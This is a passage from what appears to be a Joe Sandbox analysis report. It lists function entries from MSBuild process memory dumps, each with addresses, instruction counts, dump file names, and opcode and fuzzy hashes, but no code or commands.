                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72139f4fce8a2bd70fb7af5c15ae8a98a4288352d732e38ffe6dcf47f9a3c4d3
                          • Instruction ID: d045089e3ce0806a09f4e6776e1818d88edef341cfbcb7395b11ac3b24a64482
                          • Opcode Fuzzy Hash: 72139f4fce8a2bd70fb7af5c15ae8a98a4288352d732e38ffe6dcf47f9a3c4d3
                          • Instruction Fuzzy Hash: 2C219D75A4020AEFDF10EFA5D144AAE7FF1EB44310B0066EED01BDB250EA35AA048B80
                          Function 05904B1F Relevance: .1, Instructions: 69COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c951d3e22fa456f0885c6cdb9869061c7f8f54b3e464aa2483b71bbb517c212
                          • Instruction ID: 79b16b0c1d12731642ce3f2e7c49d70ba9c542a58af2dd6944fc8d23c7649839
                          • Opcode Fuzzy Hash: 1c951d3e22fa456f0885c6cdb9869061c7f8f54b3e464aa2483b71bbb517c212
                          • Instruction Fuzzy Hash: 9221EC34A11225CFEF28DB10CA64FADB3B6BF54604F4159D99A09AB3D0DB70AD41CE91
                          Function 05905506 Relevance: .1, Instructions: 69COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1d7d9958cd64f4717216219fc7ec6533c7631de705f550b246bdeb9ac9b17db
                          • Instruction ID: d284f7d50966237bbe85d568d7e381a1ee5d151c00bdf49e2bbe56ff0d430fd2
                          • Opcode Fuzzy Hash: c1d7d9958cd64f4717216219fc7ec6533c7631de705f550b246bdeb9ac9b17db
                          • Instruction Fuzzy Hash: D4112134B083409FDB259629D844A3FBFBBEF86610F0988AE955197291DA309800CF90
                          Function 05AA7BE8 Relevance: .1, Instructions: 69COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c604e8bf211db0d131efbf08c06e1e2f1dd17c381743e421f2101bb8a7110c2
                          • Instruction ID: b2c9619f9997353ec566f8aff1b34604d265559714e4f1e6def25371d71266c2
                          • Opcode Fuzzy Hash: 6c604e8bf211db0d131efbf08c06e1e2f1dd17c381743e421f2101bb8a7110c2
                          • Instruction Fuzzy Hash: 1721E636A001198FDB15DF58C645EEEB7F2FF88301F2041A5E405AB3A1CB76AD45CBA0
                          Function 02AED2D1 Relevance: .1, Instructions: 68COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc2dcdaf2c960d5d28f80c635d312e9aadf4ac6526e32f6ac5a2461ce4069987
                          • Instruction ID: 6792bd01f7120b03f74770a72534c390a3ca183ad15dc923d6f3251526502355
                          • Opcode Fuzzy Hash: bc2dcdaf2c960d5d28f80c635d312e9aadf4ac6526e32f6ac5a2461ce4069987
                          • Instruction Fuzzy Hash: 42216D34A055058FDF08CBA8C194BACB7F5BF98318F1981D9D4066B262CB35ED02CB51
                          Function 05AC5408 Relevance: .1, Instructions: 68COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ab8ea1b9dc4fe5af6296fca96dc2308c1ed88ae9e26dae5c4f895159bd632b6
                          • Instruction ID: d7cec199bf5be0ea4ca1f05d1c9eb7bfd80a207d836c3e8db7c28ca92fb8a870
                          • Opcode Fuzzy Hash: 3ab8ea1b9dc4fe5af6296fca96dc2308c1ed88ae9e26dae5c4f895159bd632b6
                          • Instruction Fuzzy Hash: 37212835A01A058FC764CF59CA84D26FBE6FF883117998A9DE48A8BB11DA34F841CF40
                          Function 05ACAADE Relevance: .1, Instructions: 68COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ffe8321f77d0b9e60975460b02c60d1eb0e4a4d7121a48f70097c8c92ab58c28
                          • Instruction ID: 36ec93a27e14b1eab3a1d5935cdc23e8cbaf60bf549e937523e8a46c25e2ef69
                          • Opcode Fuzzy Hash: ffe8321f77d0b9e60975460b02c60d1eb0e4a4d7121a48f70097c8c92ab58c28
                          • Instruction Fuzzy Hash: DC215E32E190356BDF489B78C9508BE73F3AFC420171A8954E8427B799CB346D05D7E2
                          Function 058FF988 Relevance: .1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c8c90bdf0646a8f7540896ae6da4fc3fe6b385fa4411e890012fd2c69cedb05
                          • Instruction ID: 30255df5fbb83aafae623437e74b732a316a477d575120f225d1327b5b636fa0
                          • Opcode Fuzzy Hash: 6c8c90bdf0646a8f7540896ae6da4fc3fe6b385fa4411e890012fd2c69cedb05
                          • Instruction Fuzzy Hash: A6213D35A001089FCB149FA9C4449DEBFB6EB8D320F148129E911AB394DA759C45CFA0
                          Function 05AAC99F Relevance: .1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07010054adc4573a3d2fa4e351b7a0367990c178584a449cf6f6b30131cf119
                          • Instruction ID: 6c575b0f62dcb9ff9979e751fc6dacb5f1d857fed572c73aa92fd12efde4f941
                          • Opcode Fuzzy Hash: b07010054adc4573a3d2fa4e351b7a0367990c178584a449cf6f6b30131cf119
                          • Instruction Fuzzy Hash: 3A21A435F10609CFCB05EF68D5949AEB7F2EF89300F10426AD505A7360EB349E06CBA1
                          Function 05AA0AB8 Relevance: .1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 40a4e14c36cac31a8b0ee8dc74e287135c17843c4454d3221759d7f05108776f
                          • Instruction ID: 92c5a875bf86bb9593fc0080f4d743d38c188184abfedf668008d894b1c07c02
                          • Opcode Fuzzy Hash: 40a4e14c36cac31a8b0ee8dc74e287135c17843c4454d3221759d7f05108776f
                          • Instruction Fuzzy Hash: F2214C72A002158FCB14DF65DA88EAFBBF6FF88754F008529D916A7355E731A801CB90
                          Function 02AE08FA Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f896dcf764fbb171009dad5a62bbf60a08d40c31ae48c5175425c411f182dd98
                          • Instruction ID: 97793c954792d61f8c54aaff53fb7abe3b0f57350a68d869007b3aec392cf197
                          • Opcode Fuzzy Hash: f896dcf764fbb171009dad5a62bbf60a08d40c31ae48c5175425c411f182dd98
                          • Instruction Fuzzy Hash: F5217C34304B129FD715CB38D548B9AFBE6FF89300F048229D6AA83745DB74B80ACB81
                          Function 02AE2ED8 Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1eb3cd2b5346038a90d8712a5e5562568b276fe3f00e046e984802a4d3adadf5
                          • Instruction ID: 2400ee48ddb64bbc219242141367d3eaaa42f4e2aa9d9d76560b97d21d2283cf
                          • Opcode Fuzzy Hash: 1eb3cd2b5346038a90d8712a5e5562568b276fe3f00e046e984802a4d3adadf5
                          • Instruction Fuzzy Hash: AF11E630B102159BDF149B65E849BAA7BF9EB44714F04442AF907E72E0DFB04C46CB91
                          Function 05905520 Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d0590036c0a98f3007b3a3afd7d66a750fbf11cf8c3ab1457fc176fbcdf0ef49
                          • Instruction ID: 5cf0a0a4c85486ac3d7b21720a2550d6c63ad904d2be1d06d70f2fdaa036828a
                          • Opcode Fuzzy Hash: d0590036c0a98f3007b3a3afd7d66a750fbf11cf8c3ab1457fc176fbcdf0ef49
                          • Instruction Fuzzy Hash: 72112334F142005FDB28A5699854F7FFBFFEFC4610F09887D991693680DE71A8018A90
                          Function 05904BA1 Relevance: .1, Instructions: 64COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 65efbe35d9b9e6d044f06e85b8403440d8bceead6ef562716ef8e2a730cc31e0
                          • Instruction ID: 218f2967a86eb291b61a37f3f9b8460a1415fdbcf1d3f9b107f58747e33aabb3
                          • Opcode Fuzzy Hash: 65efbe35d9b9e6d044f06e85b8403440d8bceead6ef562716ef8e2a730cc31e0
                          • Instruction Fuzzy Hash: 8B211B34A11229CFEF24DB10CA64FADB3B6BF44604F4159D99A09AB3D0DB70AE41CF91
                          Function 05AA7BD8 Relevance: .1, Instructions: 64COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0ba3b63e57235f59ec036b29aeca693d4ad2c08d3924e53f4d8e44b4d009a09a
                          • Instruction ID: a7c5d927e7b7886eb46b99bf21ed76ea48cff069b26ad0d9b5ded16936fdf18d
                          • Opcode Fuzzy Hash: 0ba3b63e57235f59ec036b29aeca693d4ad2c08d3924e53f4d8e44b4d009a09a
                          • Instruction Fuzzy Hash: 4721F576A002198FDB05DFA4C645EAEB7F2FF48300F2045A9E405AB2A5DB769D45CBA0
                          Function 02AE60FC Relevance: .1, Instructions: 63COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38694753bba5474f2375884bbad37b726ec915bd53fdbd8b702a56941107147f
                          • Instruction ID: af5c4867da0afe828a9b70b3a1b3d5e92564c18628ca6a9b594f209b46953eb5
                          • Opcode Fuzzy Hash: 38694753bba5474f2375884bbad37b726ec915bd53fdbd8b702a56941107147f
                          • Instruction Fuzzy Hash: D3111A70600B019FD768DF6AD684A17BBE6FF88710B548969D54AC7B64DF30E805CF90
                          Function 05AAE2E8 Relevance: .1, Instructions: 63COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4dbbe0f8d5e298e212fbd0a354c418e5360c15e44bbb881658e86bfdc9569e6c
                          • Instruction ID: eaa4e130929fd0938955982c65dd3c86ff44cb10dad971ea31137ef291a4dc4a
                          • Opcode Fuzzy Hash: 4dbbe0f8d5e298e212fbd0a354c418e5360c15e44bbb881658e86bfdc9569e6c
                          • Instruction Fuzzy Hash: CB216035B006048FCB14DF24D988E6EBBF6FF89210F144569E5059B3A1DB70ED45CBA1
                          Function 02AE6741 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1d48259bd8ef2e0ace2545bf870697abd9bdfc1c7898657d661798036e32f5dd
                          • Instruction ID: 16319dee87772142bb81e04f24d4b8ee528f630a86c5ee3ee4be9a57ab077637
                          • Opcode Fuzzy Hash: 1d48259bd8ef2e0ace2545bf870697abd9bdfc1c7898657d661798036e32f5dd
                          • Instruction Fuzzy Hash: CF1187312042105FC719EB64F5919DB7BAAEF41310715CAAED10A8F616DF26E80BCBC0
                          Function 02AE0908 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 647e91307abfd2da6f5b709d0f015ae1ac38f7d7cb0e9cad4c3e66d7f882a574
                          • Instruction ID: 345e65a4c109d2a6bee992b992475083ffe1406d1500f6f1f3bc7792ee46fdd9
                          • Opcode Fuzzy Hash: 647e91307abfd2da6f5b709d0f015ae1ac38f7d7cb0e9cad4c3e66d7f882a574
                          • Instruction Fuzzy Hash: 1F215E34304B529FD7158B38D548B9AFBE6FF89304F008629D5AA87745DB74B809CB81
                          Function 02AE2E00 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: abbf3d8419dcb9c26861bf1d082888e8383011b8c3bd14b78689f00cc8d1c461
                          • Instruction ID: 55c5ae08c720a44acbdd3134a050cdf880de70b7643bc3b59e613b2b41e8a991
                          • Opcode Fuzzy Hash: abbf3d8419dcb9c26861bf1d082888e8383011b8c3bd14b78689f00cc8d1c461
                          • Instruction Fuzzy Hash: AD210B30710BA08BDF34EB65C484B66BBE9BF40318F14985DD89B97660DF71A846CF11
                          Function 05AC477F Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ecb38e5bd9d3cba6f7716184563bcd1f21de47c4b85d9381bcc629ee88ae8d5b
                          • Instruction ID: c9c1db4539b4cc6eab36513f42b71eabc0f074703360cf49ef6681d1f51a1484
                          • Opcode Fuzzy Hash: ecb38e5bd9d3cba6f7716184563bcd1f21de47c4b85d9381bcc629ee88ae8d5b
                          • Instruction Fuzzy Hash: B3219F30E08249CFDF14DF69E554BBE7FB6FB88302F548069D41997294E7345901CB85
                          Function 05AABFC1 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b45f258456c4ab1858edb86a471c5470bfb6c8baf54bbe3bbf79a25b38303d21
                          • Instruction ID: 116de36dbcb163b9c7752fbeeeb0501ca147fbf6faf542a15f7f38387fa71a02
                          • Opcode Fuzzy Hash: b45f258456c4ab1858edb86a471c5470bfb6c8baf54bbe3bbf79a25b38303d21
                          • Instruction Fuzzy Hash: 99016977A00215AFCB06CF94C904DD9BB72FF48311B0684A5EA05AB276D332E825EB80
                          Function 05AC410F Relevance: .1, Instructions: 60COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c13d97d01a72fa294231fc51fa944f9675bee6f682256299c51dda809dfa183c
                          • Instruction ID: 8bf06a4cb5f957ff168f6d951d36d0e38fb79379372a0af74998f060376574bf
                          • Opcode Fuzzy Hash: c13d97d01a72fa294231fc51fa944f9675bee6f682256299c51dda809dfa183c
                          • Instruction Fuzzy Hash: D811E639218211CBEB29DB15E464F7B7BA7FBD8313F558069D4428B789DB349C438788
                          Function 05905D9F Relevance: .1, Instructions: 60COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b00c798cd2b3d4aa665f3ab5eae4f01ceeb9f86b508a2d2ef2b49ff47d7dd41
                          • Instruction ID: 58851687ce4b18b6f5904009d620f50302400eb0c706cb8f4889f7e462edae41
                          • Opcode Fuzzy Hash: 5b00c798cd2b3d4aa665f3ab5eae4f01ceeb9f86b508a2d2ef2b49ff47d7dd41
                          • Instruction Fuzzy Hash: C61125317083402FDB11660CCC54BABB7AEEFC6210F1A85BF5219D76C5DE66880687A1
                          Function 02AED2F8 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f8f9e59bb514fc59ff1d580026736870c8d0e6986d9fe0b4d867d4fc2d41665
                          • Instruction ID: 15516e6e4c7e06a7f2a043f7bde99bb96b6f5890e2204263e0ac823fb061907b
                          • Opcode Fuzzy Hash: 2f8f9e59bb514fc59ff1d580026736870c8d0e6986d9fe0b4d867d4fc2d41665
                          • Instruction Fuzzy Hash: C1116734A049058FCF08CFA8C284AACB7FABF98214F1581E9D006AB261CB31ED02CB51
                          Function 05904C23 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61d8086ebb18d2b3f62b939864fa010459e80e4d8a78f058b5ab66545841322e
                          • Instruction ID: 067b90dcd21c5a407b551a9b91f096bfcfd5dd3f8206b43a6c152b811462ac18
                          • Opcode Fuzzy Hash: 61d8086ebb18d2b3f62b939864fa010459e80e4d8a78f058b5ab66545841322e
                          • Instruction Fuzzy Hash: CB211A34A11229CFEF24DB10CA64FADB7B6BF44604F4159D99A09AB3D0DB70AE41CF91
                          Function 02AEAC38 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0084d4037cb8d061c20d1dad7201876836f7a683a5b551962b21d8282beba8fc
                          • Instruction ID: 52baece2093eab96366be9ecd61d55c2ec68221c9afc3b8d96564b2ff8485163
                          • Opcode Fuzzy Hash: 0084d4037cb8d061c20d1dad7201876836f7a683a5b551962b21d8282beba8fc
                          • Instruction Fuzzy Hash: 3311256510D3C44FC75A8FB088904E9BF71EF56310F2548CAD9858F663D9259C07CB12
                          Function 05AC4790 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1fc1a13d2839cbe67f19534c5fdd50e26b9075ad7ba9b21f6a5f2b84606e3ffb
                          • Instruction ID: 9fada6f0380df9c13f161b2ae36775fa63d22b3692430132482b488b96544284
                          • Opcode Fuzzy Hash: 1fc1a13d2839cbe67f19534c5fdd50e26b9075ad7ba9b21f6a5f2b84606e3ffb
                          • Instruction Fuzzy Hash: 47116A30E08115CFEF18DF6AE454BAE7FB6FB88302F508069D01A97298E7345905CB85
                          Function 05AA5B1F Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cf9f06b0d76c14c698ded4ee536829018d3b2328498c1cfda637ab27864e0a08
                          • Instruction ID: 2bc7a0721a12b3342b431aed71d81d34d11f0a910ce8a9d6a18ef919e1cd34a7
                          • Opcode Fuzzy Hash: cf9f06b0d76c14c698ded4ee536829018d3b2328498c1cfda637ab27864e0a08
                          • Instruction Fuzzy Hash: 151160B6E00218AFCF05CF99D8808CEBBB9FF48311B058166E955E7310EA30E915CBA0
                          Function 05AC4120 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c0e4b82297b86c778905c87ddd826698f3ba7e66c8adb7045ad87906f9caf412
                          • Instruction ID: 595167c9823d5b6a5b207924652736e8180fd18e302623e900880883e3667d08
                          • Opcode Fuzzy Hash: c0e4b82297b86c778905c87ddd826698f3ba7e66c8adb7045ad87906f9caf412
                          • Instruction Fuzzy Hash: 6D119138218210CBEB29DB16E454F7BBBA7F7D8713F558068D5028B789DB749C438B88
                          Function 05905DC0 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b9f181e0d37c625df8c9ea373a5c5b1bed765ea7c241e718fc4c16e80e47d214
                          • Instruction ID: 22749b2043b0e752c6e53db94b425dde82c50e3ae8433e1f474781dd694bcbef
                          • Opcode Fuzzy Hash: b9f181e0d37c625df8c9ea373a5c5b1bed765ea7c241e718fc4c16e80e47d214
                          • Instruction Fuzzy Hash: AF01B5313042092BDB14754DC854FBBB2EFEFC9210F59C53E561997784DE629C0587E1
                          Function 05AA9598 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa41723512836e44814b3a4001598b3c1f9a0d64eedf35c72727f1f361ef68ab
                          • Instruction ID: 70d42be6978cf3df78b404cbc8fc82a4f05b126e0706f51a74870d7d5b354f9f
                          • Opcode Fuzzy Hash: aa41723512836e44814b3a4001598b3c1f9a0d64eedf35c72727f1f361ef68ab
                          • Instruction Fuzzy Hash: F1112B37300104AFCB058B59D848D9AFBAAFF88321B0940AAF615C7331DB31D915DB80
                          Function 02AE7F20 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41da41a61c39e52e2b40878e7a2a5854565a6419443ae5b532a32bc487ac773c
                          • Instruction ID: 6ae253a281df0e9699a9cca4809c0273631e42cbaffc688a28b5411db4ae676b
                          • Opcode Fuzzy Hash: 41da41a61c39e52e2b40878e7a2a5854565a6419443ae5b532a32bc487ac773c
                          • Instruction Fuzzy Hash: A81148311006008FDB19DB29D940B76B7E5EB85311F0484AEE15FC3A61DF28E843C701
                          Function 05AA0040 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec22e1d2af85186555d3b885f22863a9b344892e08216e13b85479327eeb1a2e
                          • Instruction ID: 5f640653b48efdfc8913f10ddc5b48e604f76b520f4f70ac653f14440676cac2
                          • Opcode Fuzzy Hash: ec22e1d2af85186555d3b885f22863a9b344892e08216e13b85479327eeb1a2e
                          • Instruction Fuzzy Hash: C6117035B102159FCB65DF799819BBA7BF6BB88640F108029E916DB380EB71D901CBA0
                          Function 05AC5130 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
